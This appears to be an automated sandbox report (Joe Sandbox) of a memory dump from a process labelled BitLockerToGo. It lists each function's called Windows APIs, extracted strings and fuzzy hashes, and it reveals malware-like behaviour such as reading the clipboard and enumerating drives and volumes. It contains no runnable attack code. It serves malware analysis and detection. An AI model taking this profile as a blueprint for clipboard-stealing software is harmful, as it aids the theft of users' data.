Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84da31b5477cb509eff73b2f94116b2e3024469086d00236451754c945c07c22
Instruction ID: 7666dd831f876ce482c9f6947aebd70d67f64a5fe4447cbedc9ab3cd2ba5f698
Opcode Fuzzy Hash: 84da31b5477cb509eff73b2f94116b2e3024469086d00236451754c945c07c22
Instruction Fuzzy Hash: 9AF098B4518381DFD360EF28D49979BBBE0AB84304F41882DE5998B340DB749594CF92

Function 032DA40E Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 84
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 032DA565

Strings

T, xrefs: 032DA4BC
Q, xrefs: 032DA4A4
e, xrefs: 032DA444
+, xrefs: 032DA43C
o, xrefs: 032DA494
), xrefs: 032DA46C
g, xrefs: 032DA454
U, xrefs: 032DA4C4
S, xrefs: 032DA4B4
#, xrefs: 032DA48C
m, xrefs: 032DA484
i, xrefs: 032DA464
k, xrefs: 032DA474
-, xrefs: 032DA42C
%, xrefs: 032DA47C
c, xrefs: 032DA434
a, xrefs: 032DA424

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: #$%$)$+$-$Q$S$T$U$a$c$e$g$i$k$m$o
API String ID: 2525500382-4226942596
Opcode ID: 07a4ad2b43593d483ba785ca9b3435aea8e89ce1c25ab9ddafad411d027cc7bd
Instruction ID: a444dd01432e726c3fdef9465f16760d094c51e944bd8c2901e976e1f9521953
Opcode Fuzzy Hash: 07a4ad2b43593d483ba785ca9b3435aea8e89ce1c25ab9ddafad411d027cc7bd
Instruction Fuzzy Hash: 9041B37054C7C28ED371CB28D458BDFBBE1AB95318F04896DD4EC8B282DBB945898B53

Function 032E66C5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 032E6776

Strings

^-C3, xrefs: 032E66DA
P)O/, xrefs: 032E66D3
>=, xrefs: 032E66F6
V9T?, xrefs: 032E66EF

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID: >=$P)O/$V9T?$^-C3
API String ID: 1029625771-3152663825
Opcode ID: 60ebb4b0acb9d565ace6f483e5c56883d3e30e129c51a5ce6d549a9a54aeec43
Instruction ID: 32c944fc5ec5652e4664e704bb4dccc4de909e5166462db17ccdaaab1bf9b5be
Opcode Fuzzy Hash: 60ebb4b0acb9d565ace6f483e5c56883d3e30e129c51a5ce6d549a9a54aeec43
Instruction Fuzzy Hash: 782104B0201B018FC728CF19D5E4A22BBF1FF48704704896DD89A8BB5AD774E955CF94

Function 032E6596 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNELBASE ref: 032E6596
LoadLibraryW.KERNELBASE(?), ref: 032E667C

Strings

uvw, xrefs: 032E6611

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: DrivesLibraryLoadLogical
String ID: uvw
API String ID: 3125296321-3462500642
Opcode ID: 380bd151e44f8243e497f478bb5aee803d9cabd354d827c30a59e9cedea2d1d7
Instruction ID: e873d9eab308820279911afe70f588dc06a1a023fe2c3d8e6580eb143de17808
Opcode Fuzzy Hash: 380bd151e44f8243e497f478bb5aee803d9cabd354d827c30a59e9cedea2d1d7
Instruction Fuzzy Hash: 4021AB745207009FC724EF29EA99A16BBF1FF14254B44C8ACE49ADBB66D730E844CF50

Function 032E6837 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 032E68BD

Strings

!=Q, xrefs: 032E68C5

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID: !=Q
API String ID: 1029625771-697979603
Opcode ID: ac5e4077adba48bd1818bbce42923b176fe00ac90d6679a08eb9f89238cc72a0
Instruction ID: 82530795b31afd95b30a2f7b2ae3042e5779117523fab0c0958c35c2a8e0f62b
Opcode Fuzzy Hash: ac5e4077adba48bd1818bbce42923b176fe00ac90d6679a08eb9f89238cc72a0
Instruction Fuzzy Hash: 99011374100A42ABD328CF09D1A5B26B7B2FF96B14B14CA2CC4AA07B56C734B865CFC4

Function 032E2F80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 032E2FB6

Strings

\, xrefs: 032E2F85

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: InformationVolume
String ID: \
API String ID: 2039140958-2967466578
Opcode ID: b16891b046742eb93b8f95cc1bc8fc99ae84f04d06c75bd319fa1bbfab0b2227
Instruction ID: 1eb993a5b8086dc566ae4be6f9087629e66e0c40e3369803d221d11365d9b5e0
Opcode Fuzzy Hash: b16891b046742eb93b8f95cc1bc8fc99ae84f04d06c75bd319fa1bbfab0b2227
Instruction Fuzzy Hash: 1FF03075680341AFE724DF14EC53F127775EB09714F248458F786AB3D5C7B0B8108A18

Function 032B94C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 032B9514

Strings

system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 032B94EB

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: ExitProcess
String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
API String ID: 621844428-780655312
Opcode ID: e77bc1d2e5c8d95ecc126e4f74d4c26cf585ef67c971d8033f061f540f30e928
Instruction ID: a0e6b397bc13c4c7c82822cfc91dc5985e2d709354e0dd4da3e5fd34fd275f19
Opcode Fuzzy Hash: e77bc1d2e5c8d95ecc126e4f74d4c26cf585ef67c971d8033f061f540f30e928
Instruction Fuzzy Hash: 96E0C2B84793119ACB64FBA892013E977B86F153D4F44881ACAC689104EBF594C58753

Function 032E4FB0 Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 032E502F

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: da49d5822f50e5ceeb00d56024fe550c47c411ddab56d6bf0080d76e56b0c3dc
Instruction ID: 98a393063986796e6e0f0c5399bb411a954fa046bc5a667e481ab56219488e26
Opcode Fuzzy Hash: da49d5822f50e5ceeb00d56024fe550c47c411ddab56d6bf0080d76e56b0c3dc
Instruction Fuzzy Hash: EE012C74508351ABD708CF00D6A4B6FBBE2EBC5718F24892DE98A07681C3359D56DB82

Function 032E6B9E Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 032E6BA5

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9b3f85fc6bc1ac21787846d85c5c3b3e427831f8b87c41212b8bbf5c0be5cccf
Instruction ID: 009879d14239aac8ed0c397ed9bdf2e9bb5f28457c8126f3358ef93f4c9e56a8
Opcode Fuzzy Hash: 9b3f85fc6bc1ac21787846d85c5c3b3e427831f8b87c41212b8bbf5c0be5cccf
Instruction Fuzzy Hash: 0BC09B36640015FFDE101A55FC09BD97F2CDB40276F104075F60CD5154C2615567D7A0

Function 032E4F42 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 032E4F48

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f88048961c4636ff2fc005645391d0616b07860d8c09fd4e6c7f32094943ba8e
Instruction ID: 0458c441fb0c2c550c49789c240ee9a410ae686b8e93341cbfccbc35d133c578
Opcode Fuzzy Hash: f88048961c4636ff2fc005645391d0616b07860d8c09fd4e6c7f32094943ba8e
Instruction Fuzzy Hash: 50B09231540009EFDE106A80BD09FE87728EB00229F2000A5EA0C950A4C2625A6AAB84

Non-executed Functions

Function 032DCF60 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 126clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 032DCF7D
GetWindowLongW.USER32 ref: 032DCFA0
GetClipboardData.USER32 ref: 032DCFBC
GlobalLock.KERNEL32 ref: 032DCFE1
GlobalUnlock.KERNEL32 ref: 032DD104
CloseClipboard.USER32 ref: 032DD111

Strings

*, xrefs: 032DD03F
w, xrefs: 032DD053
W, xrefs: 032DD044
8, xrefs: 032DD062
#, xrefs: 032DD05D
+, xrefs: 032DD030
#, xrefs: 032DD035
-, xrefs: 032DD02B
L, xrefs: 032DD04E
s, xrefs: 032DD026
%, xrefs: 032DD049
>, xrefs: 032DD058
V, xrefs: 032DD03A

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: #$#$%$*$+$-$8$>$L$V$W$s$w
API String ID: 2832541153-3478909204
Opcode ID: 5779017c1c298e29fce2bf4aced69582c3d61bbe64a55e6c4cd045d2db52e26f
Instruction ID: 6afa0f0050f580f73ed001168780c97dfad60a8af0767e24436413aed76f579c
Opcode Fuzzy Hash: 5779017c1c298e29fce2bf4aced69582c3d61bbe64a55e6c4cd045d2db52e26f
Instruction Fuzzy Hash: B551387182C791CED300EF28E54835ABFE0AF95358F44495EE8C56B241C3B59A89CB93

Function 032B9A90 Relevance: 12.8, Strings: 10, Instructions: 342COMMON

Download Yara Rule

Strings

ll?b, xrefs: 032B9DC9
:0$, xrefs: 032B9AB9
Wm",, xrefs: 032B9C43
%*";, xrefs: 032B9AD4
0?32, xrefs: 032B9AEA
2*-#, xrefs: 032B9AC9
yt`a, xrefs: 032B9DD9
|ial, xrefs: 032B9DD1
f`>2, xrefs: 032B9DC1
0[`%, xrefs: 032B9C2B

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %*";$0?32$0[`%$2*-#$Wm",$f`>2$ll?b$yt`a$|ial$:0$
API String ID: 0-3937152311
Opcode ID: 99c3087b371fb95ab0799f4ff2a41e9e374e737632d97e594bff55405df4d947
Instruction ID: ef6647808137eeef85fa047b0141fe102fdca625008dedc226a442d4234747a6
Opcode Fuzzy Hash: 99c3087b371fb95ab0799f4ff2a41e9e374e737632d97e594bff55405df4d947
Instruction Fuzzy Hash: A0B178715183828FD715CF29C4A065BFBF0AF96384F18895DE5D58B3A2D335C886CB92

Function 032B1DF0 Relevance: 10.6, Strings: 8, Instructions: 600COMMON

Download Yara Rule

Strings

false, xrefs: 032B1F81
true, xrefs: 032B1F69
0, xrefs: 032B1E93
., xrefs: 032B1E99
null, xrefs: 032B209E
., xrefs: 032B1EBE
{, xrefs: 032B2155
[, xrefs: 032B2058

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: .$.$0$[$false$null$true${
API String ID: 0-1639024219
Opcode ID: 3ac736ac6441df58e17ea8c3a9e82c04d66ee4a5723c17dcd41c3db22af75f65
Instruction ID: e9961ab7cabe036b11b9a9a3d6bffeed940e97c4d708abc48d4eedc295453772
Opcode Fuzzy Hash: 3ac736ac6441df58e17ea8c3a9e82c04d66ee4a5723c17dcd41c3db22af75f65
Instruction Fuzzy Hash: E21249B4620306CFE710DF24D8557AABBF8AF403C4F098978D98A8B252E775E5D4CB91

Function 032D034E Relevance: 7.0, Strings: 5, Instructions: 798COMMON

Download Yara Rule

Strings

;.>4, xrefs: 032D0783
JE, xrefs: 032D0479
1mo, xrefs: 032D0425
2y, xrefs: 032D0793
*>;0, xrefs: 032D079B

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 2y$*>;0$1mo$;.>4$JE
API String ID: 0-3835197124
Opcode ID: 42173566ee3e3cf69fb1c82ed360f40ea949a5094ffe290050c14d749b8ee743
Instruction ID: 054a82a9d90589b69ad4d8d13d4ddbb25fc49601e554d13662cb3595e1d46e92
Opcode Fuzzy Hash: 42173566ee3e3cf69fb1c82ed360f40ea949a5094ffe290050c14d749b8ee743
Instruction Fuzzy Hash: E552F371618381CFD714CF28D89076EBBE6EF86324F588A6CE4958B2E5C771D845CB82

Function 032D03D1 Relevance: 7.0, Strings: 5, Instructions: 733COMMON

Download Yara Rule

Strings

;.>4, xrefs: 032D0783
JE, xrefs: 032D0479
1mo, xrefs: 032D0425
2y, xrefs: 032D0793
*>;0, xrefs: 032D079B

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 2y$*>;0$1mo$;.>4$JE
API String ID: 0-3835197124
Opcode ID: f8b3839ad692aee5854d1329cc701079adfc0a76427f6dd1996d51b52cabd35d
Instruction ID: 78c290b8dca68c8acae0b7ce01f875e1dc104fc0a285a5cc82447435f3f52203
Opcode Fuzzy Hash: f8b3839ad692aee5854d1329cc701079adfc0a76427f6dd1996d51b52cabd35d
Instruction Fuzzy Hash: CD42F271618381CFD718CF28D89076EBBE6EF85324F188A6CE4D6972A5C771D845CB82

Function 032D3BB4 Relevance: 5.5, Strings: 4, Instructions: 503COMMON

Download Yara Rule

Strings

E\_j, xrefs: 032D40CC
twj], xrefs: 032D4126
RRIP, xrefs: 032D40D6
yxJy, xrefs: 032D411C

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: E\_j$RRIP$twj]$yxJy
API String ID: 0-2435126175
Opcode ID: 26dc6e3481041e72e86e0a1a96474c8aecb9833a2d1bc774e81733a5312448cf
Instruction ID: fee4352fb0897ecddcc3db1189205b8f07df5185f3e41848e78313183f2befdd
Opcode Fuzzy Hash: 26dc6e3481041e72e86e0a1a96474c8aecb9833a2d1bc774e81733a5312448cf
Instruction Fuzzy Hash: 370268B4514B818FD325CF25C4A07A3BBE2BF96204F588A5CC4EB4BB85C775B449CB92

Function 032E324B Relevance: 3.9, Strings: 3, Instructions: 178COMMON

Download Yara Rule

Strings

ZC, xrefs: 032E338A
]U, xrefs: 032E3375
\O, xrefs: 032E337C

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ZC$\O$]U
API String ID: 0-2983913197
Opcode ID: 6ecd17495d22639bb908fcae9be41b6fd400461c448ce1651c29d373855c2447
Instruction ID: 74b68e45608f6664dfa2d9aed7010dfbeb67a19cf74759954ba2e5bce622474e
Opcode Fuzzy Hash: 6ecd17495d22639bb908fcae9be41b6fd400461c448ce1651c29d373855c2447
Instruction Fuzzy Hash: 19618D75A007019FD328CF29D485A16FBF2FB89310B148A6DD4AA8B785D734E886CFD5

Function 032CB422 Relevance: 3.4, Strings: 2, Instructions: 913COMMON

Download Yara Rule

Strings

gxyz, xrefs: 032CB9E8
gxyz, xrefs: 032CB568

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: gxyz$gxyz
API String ID: 0-4102614194
Opcode ID: 7e1d4b6b5cab5e68238028530bfd394a93e68da977a79e79f121e040be79f249
Instruction ID: f8ffa911da892827606a0e18d0f918a36ac01aba6ef82da2959b9558e7144fa9
Opcode Fuzzy Hash: 7e1d4b6b5cab5e68238028530bfd394a93e68da977a79e79f121e040be79f249
Instruction Fuzzy Hash: 3452EE76618352CFC318CF29D89062AB7E6FF89324F498A7CE89587395C734E845CB91

Function 032E5830 Relevance: 3.1, Strings: 2, Instructions: 624COMMON

Download Yara Rule

Strings

?>=<, xrefs: 032E59F6
?>=<, xrefs: 032E586F

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ?>=<$?>=<
API String ID: 0-3400647734
Opcode ID: 29a89dfac02f68e722bfc05d175e8ec0365bcdd257250685724c97e2782a6619
Instruction ID: 21a74f47c5b69013fdbd4ea188192fcd346146200d46ce3c4cf31891e3d55eaf
Opcode Fuzzy Hash: 29a89dfac02f68e722bfc05d175e8ec0365bcdd257250685724c97e2782a6619
Instruction Fuzzy Hash: 7C22F3716283429FC714CF18C891B6AF7E2FF86318FA8892CE49587391D735D845CB92

Function 032D3350 Relevance: 3.0, Strings: 2, Instructions: 529COMMON

Download Yara Rule

Strings

", xrefs: 032D37B2
", xrefs: 032D37EC

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "$"
API String ID: 0-3758156766
Opcode ID: c7ea45925fbb7c8353dde3bd729ff48e9466ae925c092e3293840a01b2242cd8
Instruction ID: 67f4b455dbb77b368f10b1b007f91f36270d386f0db2659fd9a7738aeb053cc6
Opcode Fuzzy Hash: c7ea45925fbb7c8353dde3bd729ff48e9466ae925c092e3293840a01b2242cd8
Instruction Fuzzy Hash: F80223B96283469FC714CF28C48076BBBE5AFC4304F18896DE5998B391E774D885CB93

Function 032B5C8D Relevance: 3.0, Strings: 2, Instructions: 525COMMON

Download Yara Rule

Strings

0, xrefs: 032B63DF
8, xrefs: 032B63D4

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 6352f0921141a1834ad4569dcd73756ae82b6002280d0f1c75abc30a70ddb966
Instruction ID: f40f04fba8c73b2f6af7240dfa67d2178c90395d39b2f1c8dfd02a777974205e
Opcode Fuzzy Hash: 6352f0921141a1834ad4569dcd73756ae82b6002280d0f1c75abc30a70ddb966
Instruction Fuzzy Hash: D72287716183419FD724CF18C880B9ABBF2BF89394F18891DF9898B391C375D994CB92

Function 032B5F6B Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

0, xrefs: 032B63DF
8, xrefs: 032B63D4

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: b55e5ccb824be6d57194a3bec802b3db84ff808bba1b33ce11b4270c8da8079a
Instruction ID: a27561075e5e7dc4b4247369938af6cb580ca5912893537645b7b4c903108d4a
Opcode Fuzzy Hash: b55e5ccb824be6d57194a3bec802b3db84ff808bba1b33ce11b4270c8da8079a
Instruction Fuzzy Hash: 92B11571219385AFD721CF58C880B9FBBE1AF95354F48885DF9C487352C275D898CBA2

Function 032B629B Relevance: 2.7, Strings: 2, Instructions: 220COMMON

Download Yara Rule

Strings

0, xrefs: 032B63DF
8, xrefs: 032B63D4

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 89acca1bf4a04528d208bc3b25e4e62db068cc46b8c91ba61685feebba344f93
Instruction ID: 90fba79b6f15348f22fa44ce60569fd41c9a6e4363f8517fb7707aaf8decc670
Opcode Fuzzy Hash: 89acca1bf4a04528d208bc3b25e4e62db068cc46b8c91ba61685feebba344f93
Instruction Fuzzy Hash: E9914535618381AFD721CF58C880BAEBBF1AF99350F48891DF9C887352D671D958CB62

Function 032C1E8F Relevance: 2.6, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

gxyz, xrefs: 032C1EB8
U|Aw, xrefs: 032C1F6E

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: U|Aw$gxyz
API String ID: 0-1461187319
Opcode ID: 94548d3fba18e8b10407d1bdbb77479b957180ff17225a07bdc0b57f2fbd418d
Instruction ID: 628fed771c52b4e0e38c97d2b7ef877ccd0bb620b71172918ab54ad448df9352
Opcode Fuzzy Hash: 94548d3fba18e8b10407d1bdbb77479b957180ff17225a07bdc0b57f2fbd418d
Instruction Fuzzy Hash: 5E318834A20B418FC724DF28C495B66B7E2FB49304F588A6CE18B8BB66D334F851CB40

Function 032D4F44 Relevance: 2.1, Strings: 1, Instructions: 813COMMON

Download Yara Rule

Strings

?>=<, xrefs: 032D5775

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: ?>=<
API String ID: 2994545307-3799960392
Opcode ID: e863660011332fa6237bf59a9832d0928b266057479f5064556b8e6463cd1acf
Instruction ID: 98e5aab1a147e16cacabc7de569f0da0419cad0db60424aa61e91f223709bf68
Opcode Fuzzy Hash: e863660011332fa6237bf59a9832d0928b266057479f5064556b8e6463cd1acf
Instruction Fuzzy Hash: FA52AD71114B428FD325CF29C090722FBF2BF46305F688A5DD4AA8BA96D775F489CB90

Function 032C30C3 Relevance: 1.6, Strings: 1, Instructions: 355COMMON

Download Yara Rule

Strings

b~P, xrefs: 032C34E8

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: b~P
API String ID: 0-220378149
Opcode ID: 4131babab4e1a5e87ee9d6b862fe553c7878c54d2e5a329a472937bad48c6db5
Instruction ID: c0a91ef335e93b6037ca01e0ef50f1500267c78f257977a9c60863c52370cc91
Opcode Fuzzy Hash: 4131babab4e1a5e87ee9d6b862fe553c7878c54d2e5a329a472937bad48c6db5
Instruction Fuzzy Hash: 0BD12375610B818FD325CF24C884BA3B7F5BF49304F088A6DD59A8BA92E778F845CB54

Function 032D10F6 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

q, xrefs: 032D112E

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: q
API String ID: 0-389260800
Opcode ID: d81f9221e250e4acad2f97ff4a8caeeb306d09ae14fc7ce21b90ea1a29826587
Instruction ID: 5faee94c95ee10cabcf3339727901a2706de75874bf4d820c8d16911e3566093
Opcode Fuzzy Hash: d81f9221e250e4acad2f97ff4a8caeeb306d09ae14fc7ce21b90ea1a29826587
Instruction Fuzzy Hash: C691CF756183428FC354CF28C89075BB7E2BBC9355F188A2CE49ACB395D735E855CB82

Function 032B6DC0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 032B6F0C

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: f74dc8a7fbd79ea29617ef17cf9e77e346f3440490e8108d97e0d78fa91f5612
Instruction ID: 9565daacf018cf00865520da61001b7cbdd4683ac8756755dd77a6508fbf4f9c
Opcode Fuzzy Hash: f74dc8a7fbd79ea29617ef17cf9e77e346f3440490e8108d97e0d78fa91f5612
Instruction Fuzzy Hash: DBB15B712093829FD314CF68C88479AFBF0AFA9344F484A6DF59497382D771DA58CB92

Function 032D5857 Relevance: 1.5, Strings: 1, Instructions: 252COMMON

Download Yara Rule

Strings

?>=<, xrefs: 032D5937

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ?>=<
API String ID: 0-3799960392
Opcode ID: ab433faeb08ef76f13129337b36b48ec3c4f732134026a02a6e522c4f2b1a30b
Instruction ID: ec50a02b7cbf65c51b8a6255acae906f8c984c4cd808c3862e8d6a5008436b42
Opcode Fuzzy Hash: ab433faeb08ef76f13129337b36b48ec3c4f732134026a02a6e522c4f2b1a30b
Instruction Fuzzy Hash: 8691F4316257528FC324CB28C481762F7E2BF9A310F68862DD49A8B795D7B4F885C791

Function 032E53E0 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

?>=<, xrefs: 032E5426

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ?>=<
API String ID: 0-3799960392
Opcode ID: 22b2f012b11b00d6a5caba2c3d2e4cc044fff26538b7b5e388197248c2852266
Instruction ID: 0aacaed6be88ab5f09e25445132d3d56d359b8f515fba0449d9b13910294c58d
Opcode Fuzzy Hash: 22b2f012b11b00d6a5caba2c3d2e4cc044fff26538b7b5e388197248c2852266
Instruction Fuzzy Hash: 7B21D3326282429FD718DE06D8A0B3AF7E6EFD6359F68892CD18507285C735D841CB92
